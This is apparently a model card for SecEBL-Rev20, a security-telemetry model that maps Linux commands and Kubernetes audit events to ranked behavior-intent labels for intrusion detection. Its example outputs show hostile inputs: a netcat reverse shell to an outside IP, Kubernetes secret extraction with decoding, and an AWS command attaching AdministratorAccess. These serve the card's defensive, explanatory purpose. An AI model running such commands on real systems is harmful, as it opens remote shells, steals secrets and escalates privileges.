--- license: apache-2.0 base_model: Alibaba-NLP/gte-modernbert-base library_name: sentence-transformers pipeline_tag: sentence-similarity tags: - security - intrusion-detection - behavior-analytics - intent-recognition - linux - kubernetes - audit-log - sentence-transformers --- # SecEBL-Rev20 **SecEBL** stands for **Security Event Behavior Labeler**. SecEBL-Rev20 is an intent-recognition model for security telemetry. It maps a Linux command line or normalized Kubernetes AuditLog event into ranked behavior-intent labels, so downstream detection can reason about what an actor is trying to do instead of only matching fixed strings, allowlists, blacklists, or opaque risk scores. Project repository: [github.com/EBWi11/SecEBL](https://github.com/EBWi11/SecEBL) ## At A Glance | Area | Current release summary | | --- | --- | | Stable public API | L1 behavior-intent labeling with ranked `top_labels`. | | Behavior vocabulary | 361 Rev20 behavior-intent tags across 12 security behavior groups. | | Training scale | 86,285 internal corpus rows, 82,895 usable training observations, and 118,858 effective command/tag training pairs. | | Corpus breadth | Linux commands plus normalized Kubernetes AuditLog events, covering roughly 2,700 distinct Linux first-token/tool forms and common security/operations tooling. | | Benchmark scale | 12,594-row internal Linux command benchmark covering all 361 behavior tags, 663 internal Linux sessions, and a 6,286,568-row / 102,117-session pressure stream. | | L1 accuracy | 98.49% top5 any-hit and 96.44% micro recall@5 on the internal Linux command benchmark; 100.00% top5 coverage on the K8s evaluation set. | | Inference performance | RTX 5090 spot-check: mean 5,308.72 unique cmdlines/s with FP16 + SDPA; exact raw-event cache lookup measured separately at about 1.8M rows/s. | | Training setup | `Alibaba-NLP/gte-modernbert-base`, MNRL with hard-negative-aware batches, RTX 5090 32GB, 128 full-pass epochs, batch size 112, about 16.2 hours. | The public examples include a reviewed, publicly releasable subset of the internal Linux final benchmark plus normalized Kubernetes AuditLog examples: 10,520 Linux rows across 531 sessions and 144 K8s rows across 46 sessions. They exist so users can run the model locally and inspect outputs without access to private telemetry. The full training corpora, full internal benchmarks, private pressure-stream rows, and private run logs are not redistributed because parts of them contain real telemetry or real operational context. ## First-Time User Path Use the companion GitHub repository for the runnable code and this Hugging Face repository for model artifacts: ```bash git clone https://github.com/EBWi11/SecEBL.git cd SecEBL git lfs install git clone https://huggingface.co/willchen0011/SecEBL model_artifacts pip install -e . scripts/run_examples.sh ``` After the script finishes, inspect: ```text runs/examples/linux_l1/predictions.jsonl runs/examples/l2/example_linux_session_results.json ``` L1 is the stable behavior-labeling API. It outputs ranked behavior evidence, not an intrusion verdict. L2 is optional and experimental; it runs only when an L2 artifact such as `model_artifacts/l2_artifacts/logreg.joblib` is available. ## What This Repository Contains This Hugging Face repository is the model artifact bundle. | Path | Purpose | | --- | --- | | `model.safetensors`, tokenizer/config files | SentenceTransformers-compatible SecEBL-Rev20 embedding model. | | `semantic_texts.jsonl` | Rev20 semantic label texts used by the L1 retrieval path. | | `schema/tags_schema_rev20.json` | Canonical Rev20 behavior vocabulary, 361 tags across 12 groups. | | `examples/linux/` | Public subset of the internal Linux final benchmark and matching Rev20 labels. | | `examples/k8s/` | Public normalized Kubernetes AuditLog examples and matching Rev20 labels. | | `examples/manifest.json` | Public example subset counts and distribution. | | `rev20_tag_rfc.md` | Rev20 behavior-tag labeling RFC and boundary examples. | | `l2_artifacts/logreg.joblib` | Experimental L2 logistic-regression session scorer. | | `l2_artifacts/tag_risk_policy.rev20.json` | Matching L2 feature policy. Its tag-selection settings are internal to L2 feature extraction. | | `l2_artifacts/train_summary.json` | Public aggregate L2 training/evaluation summary with no raw rows or real session identifiers. | | `LICENSE`, `NOTICE` | Model license and attribution notices. | This repository does not include the runnable helper scripts. Use [EBWi11/SecEBL](https://github.com/EBWi11/SecEBL) for the Python package and one-command test script. The same public benchmark-subset examples are included here for convenience. ## Output Shape L1 predictions expose ranked `top_labels`: ```json { "observation_id": "event:0", "command": "nc -e /bin/sh 203.0.113.10 4444", "top_labels": [ { "label_id": "spawn_reverse_shell", "score": 0.811, "axis": "execution_and_process" }, { "label_id": "connect_external_service", "score": 0.488, "axis": "network" } ] } ``` L1 does not emit `behavior_tags` and does not apply a user-facing tag-selection threshold. `behavior_tags[]` is the field used by training and evaluation label files. Runtime prediction output is ranked `top_labels`. ## Why Intent Labels Matter Traditional IDS pipelines often depend on signatures, rules, allowlists, blacklists, and low-explainability tabular ML. Those tools still matter, but they can struggle when legitimate tools are used in suspicious ways, when tool syntax drifts quickly, or when the same behavior appears in different telemetry formats. SecEBL adds an intermediate representation: ```text raw security event -> L1 behavior-intent recognition -> L2 session reasoning or another downstream detector -> alert / review / policy ``` L1 intentionally does not decide that a single event is an intrusion. It produces explainable behavior evidence such as `read_credential_material`, `execute_remote_command`, `create_scheduled_task`, `grant_cluster_privilege`, or `query_service_health`. This is useful for: - LOLT / living-off-the-land behavior where the tool is legitimate but the behavior may be suspicious in context. - Rule-writing lag, where new tool syntax appears faster than signatures can be maintained. - Multi-platform telemetry, where Linux commands, Kubernetes audit events, and future telemetry can share a behavior vocabulary. - Explainable detection, where an alert should be tied to explicit behavior labels rather than only an opaque score. ## Data And Vocabulary Rev20 is a flat behavior-tag schema. | Item | Count | | --- | ---: | | Top-level behavior groups | 12 | | Behavior tags | 361 | Schema groups: | Group | Tags | | --- | ---: | | `observation_and_discovery` | 51 | | `configuration_and_log_modification` | 12 | | `filesystem_and_data` | 33 | | `execution_and_process` | 28 | | `network` | 51 | | `identity_auth_and_secrets` | 31 | | `persistence_services_and_storage` | 27 | | `kernel_memory_and_tracing` | 14 | | `package_build_and_source` | 19 | | `database_and_infrastructure_services` | 33 | | `containers_and_cloud_native` | 34 | | `cloud_control_plane` | 28 | The release baseline was trained from internal Rev20 corpora: | Corpus | Rows | Unique behavior tags | Notes | | --- | ---: | ---: | --- | | Linux command corpus | 85,277 | 361 | Mixed generated, reviewed, and manually expanded command examples. | | Kubernetes AuditLog corpus | 1,008 | 40 | Manually authored normalized K8s audit events. | The Linux corpus covers roughly 2,700 distinct first-token/tool forms by a conservative executable-name estimate. Common families include shell utilities, network tools, package/build tools, cloud CLIs, IaC tools, container tooling, databases, secret stores, and Kubernetes tooling. ## Training Details The raw training corpora are not redistributed, but the following details are documented so readers can understand the model scale and method. | Item | Value | | --- | --- | | Base model | `Alibaba-NLP/gte-modernbert-base` | | Training objective | `MultipleNegativesRankingLoss` with hard-negative-aware batches | | Training hardware | NVIDIA GeForce RTX 5090, 32GB VRAM, `cuda:0` | | Epochs | 128 full-pass epochs | | Batch size | 112 | | Precision | `fp32` | | Steps | 1,062 steps per epoch; 135,936 total optimizer steps | | Runtime | 58,291 seconds, about 16.2 hours | | Sequence length | 160 tokens | | Optimizer schedule | learning rate `2e-5`, warmup ratio `0.06`, 8,156 warmup steps, weight decay `0.01` | Training data scale: | Training artifact | Count | Notes | | --- | ---: | --- | | Combined corpus rows | 86,285 | 85,277 Linux command rows plus 1,008 K8s AuditLog rows. | | Non-empty training observations | 82,895 | Rows with usable behavior labels after skipping 3,390 abstain rows. | | Base command-tag pairs | 117,092 | Positive command/tag pairs before boundary upsampling. | | Effective positive pairs | 118,858 | Final pair count after targeted boundary upsampling. | | Behavior labels | 361 | Full Rev20 behavior vocabulary used on the label side. | The Linux corpus is intentionally mixed rather than a single synthetic source. The largest source slices are roughly 36.9k generated rows, 28.5k manually reviewed rows, 4.0k benchmark-prune/migration rows, 3.6k common-difference gap rows, 2.7k reviewed generated rows, 2.6k baseline manual rows, and 2.3k attack batch rows, plus smaller targeted boundary, miss-review, public-attack, and high-miss batches. Token lengths are short enough for a compact encoder. Across the final pair set, command-side text is p50 32 tokens, p90 55, p95 68, and p99 113; fewer than 0.3% of examples exceed the 160-token training limit. Label-side semantic texts are p50 40 tokens and p95 62. Hard negatives were designed in two layers: - Schema-level negatives: the dataset builder used `schema_hard`, with a 16-item hard-negative pool and up to 8 negatives per positive before MNRL batching. These negatives come from semantically nearby Rev20 tags, so the model is forced to separate labels such as read-vs-search, inspect-vs-modify, local-vs-remote execution, and similar tool-boundary cases. - Batch-level negatives: the training loader used hard-negative-aware MNRL batches. The final run used config `rev20_conservative_20260620_ep96_miss_v11`, covering 74 difficult labels and placing 2 hard-negative labels near each anchor where possible. - Boundary upsampling: 1,766 boundary-sensitive pairs were duplicated once, producing 1,766 extra training exposures. These rows target recurring failure modes such as grep/read ambiguity, wrapper commands, tool-specific boundaries, no-hit review cases, and post-evaluation miss-review batches. ## Public Benchmark Subset This Hugging Face repository includes the same public benchmark examples as the companion GitHub repository: the Linux benchmark subset under `examples/linux/` and normalized Kubernetes AuditLog examples under `examples/k8s/`. | Public artifact | Rows | Sessions | Notes | | --- | ---: | ---: | --- | | `examples/linux/example_sessions.jsonl` | 10,520 | 531 | Publicly releasable subset of the internal Linux final benchmark; 2,934 normal-operation rows and 7,586 intrusion rows. | | `examples/linux/example_gold.rev20.jsonl` | 10,520 | 531 | Matching Rev20 behavior labels; 10,019 labeled rows, 14,807 behavior-label instances, and 349 unique behavior tags. | | `examples/k8s/example_sessions.jsonl` | 144 | 46 | Public normalized Kubernetes AuditLog examples; 72 normal-operation rows and 72 intrusion rows. | | `examples/k8s/example_gold.rev20.jsonl` | 144 | 46 | Matching Rev20 behavior labels; 144 labeled rows, 163 behavior-label instances, and 27 unique behavior tags. | Session-level labels use English enums: `normal_operation` and `intrusion`. The full internal Linux benchmark remains larger: 12,594 rows, 663 sessions, and complete 361-tag coverage. ## Evaluation Snapshot The full internal benchmark data is not public. The aggregate size, distribution, and metrics are public so users can understand what the headline numbers mean. Evaluation scale: | Dataset | Rows | Rows with labels | Behavior-tag instances | Unique behavior tags | | --- | ---: | ---: | ---: | ---: | | Linux internal benchmark | 12,594 | 11,889 | 17,287 | 361 / 361 | | K8s evaluation set | 144 | 144 | 163 | 27 / 361 | | Combined | 12,738 | 12,033 | 17,450 | 361 / 361 | Retrieval quality: | Dataset | Dynamic exact | Top5 any-hit | Top5 all-covered | Micro recall@5 | | --- | ---: | ---: | ---: | ---: | | Linux internal benchmark | 87.32% | 98.49% | 95.44% | 96.44% | | K8s evaluation set | 99.31% | 100.00% | 100.00% | 100.00% | | Combined | 87.47% | 98.50% | 95.50% | 96.47% | The Linux benchmark covers the complete 361-tag Rev20 vocabulary and includes complex multi-tag command rows. The K8s result should be read as a small-domain sanity result rather than broad Kubernetes coverage because the current K8s corpus is much smaller than the Linux corpus. Internal Linux benchmark tag cardinality: | Tags per row | Rows | | --- | ---: | | 0 | 705 | | 1 | 8,829 | | 2 | 1,567 | | 3 | 901 | | 4 | 402 | | 5 | 139 | | 6+ | 51 | Top internal Linux benchmark tags: | Tag | Count | | --- | ---: | | `stage_temporary_path` | 987 | | `inspect_network_state` | 801 | | `stage_hidden_path` | 655 | | `inspect_current_identity` | 578 | | `read_credential_material` | 551 | | `inspect_system_state` | 481 | | `inspect_infrastructure_service` | 390 | | `query_dns_records` | 372 | | `enumerate_filesystem` | 365 | | `search_credentials` | 315 | ## Example Outputs These examples show the user-facing L1 output style. Scores are cosine/retrieval scores after the release prompt profile. The public helper scripts save top labels in `predictions.jsonl`. | Event | Top 3 L1 tags | Note | | --- | --- | --- | | `nc -e /bin/sh 203.0.113.10 4444` | spawn_reverse_shell 0.811
connect_external_service 0.488
spawn_bind_shell 0.451 | `-e` is recognized as reverse-shell execution. | | `nc -v 203.0.113.10 443` | connect_external_service 0.732
spawn_reverse_shell 0.503
create_reverse_tunnel 0.412 | Connection intent ranks above shell-spawn intent. | | `cat /root/install.log` | read_business_log 0.641
read_system_log 0.431
read_workload_logs 0.385 | Log-read semantics dominate. | | `cat /root/install.conf` | read_infrastructure_config 0.620
read_system_config 0.612
read_kernel_parameter 0.336 | Config-read semantics dominate. | | `kubectl -n prod get secret payment-api-token -o jsonpath={.data.token} \| base64 -d` | read_cluster_secret 0.730
decode_data 0.716
read_credential_material 0.363 | K8s secret extraction and decoding. | | `aws iam attach-user-policy --user-name temp --policy-arn arn:aws:iam::aws:policy/AdministratorAccess` | grant_cloud_privilege 0.838
modify_cloud_identity_policy 0.535
modify_cloud_identity 0.459 | Cloud privilege escalation semantics. | | `curl -fsS http://127.0.0.1:8080/healthz` | query_service_health 0.840
inspect_local_kubernetes_cluster 0.459
inspect_container_runtime 0.383 | Local service health check. | ## Runtime Performance SecEBL-Rev20 is a SentenceTransformers-style embedding retriever over 361 Rev20 tag definitions. The serving path embeds the event, embeds or loads tag definition embeddings, then ranks tags by similarity. Current single-card CUDA recommendation: | Setting | Value | | --- | --- | | Precision | FP16 | | Attention | SDPA | | `max_seq_length` | 160 | | Batch size | 224 default; 384 was slightly faster in one RTX 5090 sweep but not enough to replace the stable default | | Sorting | `sort_by=char` | | Padding | dynamic, no forced pad alignment | | Output path | GPU tensor output plus GPU top-k | Measured on an NVIDIA GeForce RTX 5090 32GB spot-check: | Mode | Throughput | | --- | ---: | | Recommended no-cache unique inference, `bs224` | mean 5,308.72 unique cmdlines/s | | Recommended no-cache latency, `bs224` | about 0.1884 ms per unique cmdline | | `bs224` repeat range | 5,025.47 - 5,433.78 unique cmdlines/s | | Best quick-sweep point, `bs384` | 5,378.45 unique cmdlines/s | Exact raw-event cache lookup was measured separately at mean 1,817,462.76 rows/s. Cache hits reuse saved L1 top-k results and do not run model inference. ## L2 Artifact This repository includes an experimental fitted L2 session scorer so the companion GitHub `scripts/run_examples.sh` can run the public Linux and K8s L1 examples, plus Linux example-session scoring, when this model directory is used as `MODEL_DIR`. In this release, a **session** is a sequence of events grouped by `session_id`. L1 labels each event independently. L2 scores the whole session by aggregating cached L1 ranked tags, retrieval scores, tag diversity, behavior transitions, and routine-operation context. The L2 output is a session-level verdict such as `intrusion` or `normal_operation`, not a replacement for per-command behavior tags. For compatibility with the released L2 artifact, L2 derives its session features from cached L1 `top_labels` using an internal selected-tag feature path. In plain terms, L2 filters the cached ranked labels inside its own feature builder before session scoring. This does not change L1 prediction output: users still receive ranked `top_labels`, not a selected `behavior_tags` field. Runtime L2 does not use raw command text, user names, host names, or session ids as scoring features. Session ids may appear in private data-prep workflows for label assignment, but they are not runtime allow/deny lists. Internal L2 summary: | Check | Result | | --- | ---: | | Withheld Linux session benchmark | 663 sessions, 365 TP, 298 TN, 0 FP, 0 FN | | 7M pressure-stream fit-check | 6,286,568 rows, 102,117 sessions, 61 alert sessions | | OOF validation | 5,747 sessions, 99.39% accuracy, 96.44% attack precision, 95.31% attack recall | The 7M pressure-stream result was measured on real background telemetry plus embedded synthetic attack sessions. The underlying rows and real session identifiers are not redistributed. The included L2 artifact is a research/reproducibility component, not a general production IDS claim. ## Direct SentenceTransformers Loading You can load the embedding model directly: ```python from sentence_transformers import SentenceTransformer model = SentenceTransformer("willchen0011/SecEBL") ``` Direct loading gives you the encoder only. SecEBL is a retrieval-style labeler: encode the event, encode or load the Rev20 semantic label texts from `semantic_texts.jsonl`, rank labels by cosine similarity, and save the top-k labels. For normal use, prefer the companion GitHub helpers because they keep the prompt profile, semantic text loading, top-k output format, and optional L2 feature path aligned with this release. ## Intended Use - Research and evaluation of security-event behavior labeling. - Internal security detection, investigation, and triage for systems an organization owns, operates, administers, or is explicitly authorized to defend. - Building session-level risk scoring over SecEBL behavior-label streams. ## Out Of Scope - Standalone verdicting on a single event. - Authorization or policy-compliance decisions without human validation. - Monitoring systems you are not authorized to defend. ## License This Hugging Face repository is released under **Apache License 2.0**. The base model is `Alibaba-NLP/gte-modernbert-base`, which is also Apache-2.0. Source code, schemas, public examples, public documentation, helper scripts, model artifacts, and the experimental L2 artifact are Apache-2.0 unless a file explicitly states otherwise.